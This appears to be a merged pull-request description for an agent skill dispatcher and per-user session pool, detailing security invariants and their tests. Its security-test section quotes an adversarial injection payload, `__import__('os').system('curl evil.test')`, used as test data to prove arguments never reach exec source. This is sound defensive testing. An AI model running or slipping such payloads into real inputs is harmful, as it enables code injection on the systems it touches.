feat(agentcore-strands): U4 unified skill dispatcher + session pool (SI-2/3/6)#510
Merged
…SI-2/3/6)

Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today: the Dockerfile COPY picks it up (via U2a's wildcard) and `_boot_assert` registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer.

## What lands

### `container-sources/skill_session_pool.py`

Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API:

- `acquire(key) -> SessionHandle` (warm reuse or fresh start)
- `handle.release()`
- `flush_for_tenant(tenant_id)`: U12 kill-switch path
- `flush_all()`: ops escape hatch
- `prune_idle()`: caller decides cadence; exposed so tests advance time

### `container-sources/skill_dispatcher.py`

`dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`.

Security invariants enforced:

- **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source.
- **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session.
- Depth cap 5 (`SkillDepthExceeded`), per-turn budget 50 (`SkillTurnBudgetExceeded`).
- Stdout parsed as JSON; structured errors (`SkillOutputParseError`, `SkillTimeout`, `SkillExecutionError`, `SkillNotFound`) all ride the same `DispatchResult` shape for uniform audit downstream.

SI-3 (user-scoped pool key) is enforced structurally in the pool itself.

### `test_skill_session_pool.py`: 9 cases

Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all.
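The pool behaviour described above (keying on `(tenant_id, user_id, environment)`, a per-key lock, warm reuse, idle pruning, tenant flush) can be illustrated with a minimal sketch. This is not the code in `skill_session_pool.py`: the class name `SketchSessionPool`, the injected `start_session`/`stop_session`/`clock` callables, and the choice to raise when every slot for a key is busy are assumptions made for illustration, and LRU eviction is left out for brevity.

```python
import asyncio
import itertools
import time
from collections import defaultdict


class SessionHandle:
    """One pooled session; hypothetical shape, not the real class."""

    def __init__(self, key, session_id, clock):
        self.key, self.session_id, self._clock = key, session_id, clock
        self.in_use = True
        self.last_used = clock()

    def release(self):
        # Mark the slot idle so a later acquire on the same key can reuse it.
        self.in_use = False
        self.last_used = self._clock()


class SketchSessionPool:
    def __init__(self, start_session, stop_session, *, cap=8,
                 idle_seconds=30 * 60, clock=time.monotonic):
        self._start, self._stop = start_session, stop_session
        self._cap, self._idle, self._clock = cap, idle_seconds, clock
        self._slots = defaultdict(list)          # key -> [SessionHandle]
        self._locks = defaultdict(asyncio.Lock)  # key -> per-key lock

    async def acquire(self, key):
        # The per-key lock serialises acquires on one key, so two callers
        # cannot both decide to start a session for the same idle state.
        async with self._locks[key]:
            idle = [h for h in self._slots[key] if not h.in_use]
            if idle:
                handle = max(idle, key=lambda h: h.last_used)  # warm reuse
                handle.in_use = True
                return handle
            if len(self._slots[key]) >= self._cap:
                raise RuntimeError("all slots for this key are in use")
            handle = SessionHandle(key, await self._start(key), self._clock)
            self._slots[key].append(handle)
            return handle

    async def prune_idle(self):
        # Caller decides cadence; in-use sessions are never stopped here.
        now = self._clock()
        for handles in list(self._slots.values()):
            for h in list(handles):
                if not h.in_use and now - h.last_used >= self._idle:
                    handles.remove(h)
                    await self._stop(h.session_id)

    async def flush_for_tenant(self, tenant_id):
        # key[0] is tenant_id, so other tenants' sessions are untouched.
        for key in [k for k in self._slots if k[0] == tenant_id]:
            for h in self._slots.pop(key):
                await self._stop(h.session_id)


async def demo():
    ids, stopped, now = itertools.count(1), [], [0.0]

    async def start_session(key):
        return f"session-{next(ids)}"

    async def stop_session(session_id):
        stopped.append(session_id)

    pool = SketchSessionPool(start_session, stop_session, clock=lambda: now[0])
    alice, bob = ("tenant-1", "alice", "prod"), ("tenant-1", "bob", "prod")
    first = await pool.acquire(alice)
    first.release()
    again = await pool.acquire(alice)  # same key: warm session is reused
    other = await pool.acquire(bob)    # same tenant, different user: new session
    again.release()
    other.release()
    now[0] += 30 * 60                  # advance the frozen clock past the timeout
    await pool.prune_idle()
    return first.session_id, again.session_id, other.session_id, stopped


if __name__ == "__main__":
    print(asyncio.run(demo()))
```

Injecting the clock is what lets a test "advance time" without sleeping, which is presumably why `prune_idle()` is exposed rather than run on an internal timer.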
### `test_skill_dispatcher.py`: 9 cases

Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure.

### `test_skill_dispatcher_security.py`: 6 cases

Each named with its SI number so grep surfaces coverage at review time:

- SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through `_args.json` unchanged, never appear in the exec string.
- SI-2: exec template byte-identical across two invocations with different args, a structural assertion that fails if anyone ever reintroduces interpolation.
- SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates.
- SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug.

### Wiring

- `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows `skill_dispatcher` + `skill_session_pool` so the Dockerfile RUN asserts they landed.
- `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers.

## What this does NOT do

- Does NOT wire the dispatcher into server.py's `Agent(tools=...)` flow. That's U5 (Skill meta-tool).
- Does NOT extract the quota/audit loop from `server.py:682-755`. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires. Extracting now would add a seam with no caller yet.
- Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness.

## Test plan

- [x] `uv run ... pytest` on the three new files: 24 tests green
- [x] Full `pytest packages/agentcore-strands/agent-container/`: 211 green (24 new + 187 existing)
- [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests)
- [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts`: 9 tests green
- [x] ruff import-sort clean on every new file
- [x] prettier clean on every touched TS file

Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
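The depth cap, per-turn budget, and uniform `DispatchResult` shape named in the commit message could look roughly like the sketch below. Only the limits (5 and 50) and the exception and result names come from the text above; the `TurnCounters` fields, the `DispatchResult` fields, and the `guarded_dispatch` helper are hypothetical and stand in for whatever `dispatch_skill_script` actually does with its `counters` argument.

```python
from dataclasses import dataclass
from typing import Any, Callable, Optional

MAX_DEPTH = 5            # depth cap from the commit message
MAX_CALLS_PER_TURN = 50  # per-turn budget from the commit message


class SkillDepthExceeded(Exception):
    pass


class SkillTurnBudgetExceeded(Exception):
    pass


@dataclass
class DispatchResult:
    # Assumed fields: success and failure share one shape so an audit hook
    # can log every outcome the same way.
    ok: bool
    output: Any = None
    error: Optional[str] = None  # exception class name on failure


@dataclass
class TurnCounters:
    depth: int = 0  # current nesting of skill-calls-skill
    calls: int = 0  # dispatches admitted so far this turn


def guarded_dispatch(counters: TurnCounters,
                     invoke: Callable[[], Any]) -> DispatchResult:
    try:
        if counters.depth >= MAX_DEPTH:
            raise SkillDepthExceeded(f"depth cap {MAX_DEPTH} reached")
        if counters.calls >= MAX_CALLS_PER_TURN:
            raise SkillTurnBudgetExceeded(f"budget {MAX_CALLS_PER_TURN} spent")
    except (SkillDepthExceeded, SkillTurnBudgetExceeded) as exc:
        return DispatchResult(ok=False, error=type(exc).__name__)
    counters.calls += 1
    counters.depth += 1
    try:
        return DispatchResult(ok=True, output=invoke())
    except Exception as exc:  # any script failure rides the same shape
        return DispatchResult(ok=False, error=type(exc).__name__)
    finally:
        counters.depth -= 1   # unwind even when the script raised


def nest(counters: TurnCounters, levels: int) -> Any:
    """Dispatch `levels` skills, each one calling the next."""
    if levels == 0:
        return "leaf"
    result = guarded_dispatch(counters, lambda: nest(counters, levels - 1))
    return result.output if result.ok else result.error


if __name__ == "__main__":
    print(nest(TurnCounters(), 5))  # five nested levels fit under the cap
    print(nest(TurnCounters(), 6))  # the sixth level is rejected
```

Returning a result object instead of letting the exception propagate is one way to keep the "max OK, max+1 rejected" boundary testable with plain equality checks.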
This was referenced Apr 24, 2026
ericodom added a commit that referenced this pull request on May 5, 2026
## Summary

Lands the single code path that every skill-with-scripts invocation will flow through once the Skill meta-tool (U5) wires it in. Today it ships as inert code: the Dockerfile COPY picks it up (via U2a's wildcard) and `_boot_assert` registers it, but no production path calls it yet. Shadow dispatch in U7 is the first consumer.

Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4).

## Why this is low-risk to land now

- … `skill_dispatcher`; `run_skill_dispatch.py` still serves every live composition.
- … `start_session`/`stop_session`, dispatcher's `runner`). No boto3 in the hot path; AgentCore contact only happens when U7 wires the real runner.
- … `sys.modules` purge before import", part of the exec template. Breaking any would show up as a test failure before it showed up as a CVE.

## The three security invariants

- **SI-2**: `writeFiles([{path:"_args.json", text:json.dumps(args)}])` + fixed exec template that reads the file. Adversarial args (`__import__('os').system(...)`, nested `exec()`, unicode) round-trip unchanged through `_args.json` and never appear in the exec source. Regression test asserts exec string is byte-identical across two invocations with different args.
- **SI-3**: `SkillSessionPool` keys on `(tenant_id, user_id, environment)`. `test_si3_users_on_same_tenant_get_distinct_sessions` proves alice and bob can't share a warm session. `flush_for_tenant` isolates across tenants.
- **SI-6**: exec template purges `sys.modules['scripts.<slug>.*']` + `importlib.invalidate_caches()` before `from scripts.<slug>.entrypoint import run`. A monkey-patch from call N cannot leak into call N+1 on the same pooled session.

## Test counts

- `test_skill_session_pool.py`: 9 cases (acquire/reuse, concurrency, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant, flush-all)
- `test_skill_dispatcher.py`: 9 cases (happy path, unknown slug, non-JSON stdout, timeout, non-zero exit, depth-cap boundary, turn budget, audit hook)
- `test_skill_dispatcher_security.py`: 6 cases, each named with its SI number so `grep test_si` surfaces coverage at review time
- `sandbox-preflight.test.ts`: 9 green

## What this PR does NOT do

- Does NOT wire the dispatcher into `server.py`'s `Agent(tools=...)` flow. That's U5.
- Does NOT extract the quota/audit loop from `server.py:682-755`. Deferred to U7 where quota actually fires; extracting now would add a seam with no caller.

## Wiring

- `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows `skill_dispatcher` + `skill_session_pool` so the Dockerfile RUN asserts they landed.
- `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on input + result. Defaults to `execute_code` for backwards compat.

## Test plan

- `pnpm --filter @thinkwork/api typecheck` green
- `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts`: 9 green

🤖 Generated with Claude Code
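To make the SI-2 and SI-6 invariants concrete, here is a small self-contained sketch of a fixed exec template that reads `_args.json` and purges `scripts.<slug>.*` before importing. It is an illustration under assumptions, not the template shipped in `skill_dispatcher.py`: the slug grammar, the helper names (`render_exec_source`, `build_files`, `run_in_process`), and the in-process `exec` that stands in for the sandbox's writeFiles/executeCode calls are all hypothetical.

```python
import contextlib
import io
import json
import os
import re
import sys
import tempfile
from pathlib import Path

# Fixed source text. Only a validated slug is substituted; args never are.
EXEC_TEMPLATE = '''\
import importlib, json, sys
for _name in [m for m in sys.modules
              if m == "scripts.{slug}" or m.startswith("scripts.{slug}.")]:
    del sys.modules[_name]          # SI-6: drop modules cached by earlier calls
importlib.invalidate_caches()
from scripts.{slug}.entrypoint import run
with open("_args.json", encoding="utf-8") as _fh:
    _args = json.load(_fh)          # SI-2: args arrive as data, not source
print(json.dumps(run(**_args)))
'''

_SLUG_RE = re.compile(r"[a-z][a-z0-9_]*")  # assumed slug grammar


def render_exec_source(slug: str) -> str:
    if not _SLUG_RE.fullmatch(slug):
        raise ValueError(f"invalid skill slug: {slug!r}")
    return EXEC_TEMPLATE.format(slug=slug)


def build_files(args: dict) -> list:
    # Mirrors the writeFiles payload shape quoted in the PR description.
    return [{"path": "_args.json", "text": json.dumps(args)}]


def run_in_process(slug: str, args: dict, workdir: str):
    """Local stand-in for writeFiles + executeCode on one pooled session."""
    for f in build_files(args):
        Path(workdir, f["path"]).write_text(f["text"], encoding="utf-8")
    out, old_cwd = io.StringIO(), os.getcwd()
    os.chdir(workdir)
    sys.path.insert(0, workdir)
    try:
        with contextlib.redirect_stdout(out):
            exec(render_exec_source(slug), {"__name__": "__sandbox__"})
    finally:
        os.chdir(old_cwd)
        sys.path.remove(workdir)
    return json.loads(out.getvalue())


DEMO_SCRIPT = '''\
STATE = {"patched": False}

def run(value, patch=False):
    seen = STATE["patched"]   # what a previous call left behind, if anything
    if patch:
        STATE["patched"] = True
    return {"value": value, "saw_patch": seen}
'''


def demo() -> list:
    evil = "__import__('os').system('curl evil.test')"
    with tempfile.TemporaryDirectory() as tmp:
        pkg = Path(tmp, "scripts", "demo")
        pkg.mkdir(parents=True)
        Path(tmp, "scripts", "__init__.py").write_text("")
        Path(pkg, "__init__.py").write_text("")
        Path(pkg, "entrypoint.py").write_text(DEMO_SCRIPT)
        first = run_in_process("demo", {"value": evil, "patch": True}, tmp)
        second = run_in_process("demo", {"value": "ok"}, tmp)
    for name in [m for m in sys.modules
                 if m == "scripts" or m.startswith("scripts.")]:
        del sys.modules[name]  # tidy up the demo's own imports
    return [first, second]


if __name__ == "__main__":
    print(demo())
```

In the demo, the first call mutates module-level state and the second call still sees a fresh module, because the template re-imports `scripts.demo.entrypoint` each time. The adversarial string comes back as an ordinary value and never appears in the rendered source.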